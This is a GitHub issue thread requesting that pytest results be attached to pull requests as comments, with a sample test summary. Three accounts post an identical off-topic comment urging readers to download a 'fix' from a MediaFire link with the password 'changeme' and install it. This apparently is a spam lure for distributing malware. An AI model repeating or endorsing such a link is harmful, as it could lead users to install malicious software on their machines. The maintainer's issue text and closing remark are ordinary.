### ISSUE TITLE
feat: attach pytest output to PR as a comment 

### ISSUE THREAD

**Issue by metacoma** [mindwm/mindwm-gitops#87]
example pytest output
```
PASSED
test_nats.py::Test_Nats::test_deployment PASSED
test_nats.py::Test_Nats::test_statefulset PASSED

========================================================================== 4 passed in 0.18s ==========================================================================
|   filepath   | passed | SUBTOTAL |
| ------------ | -----: | -------: |
| test_nats.py |      3 |        3 |
| test_node.py |      1 |        1 |
| TOTAL        |      4 |        4 |
```

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by metacoma** [comment]
closed by #92
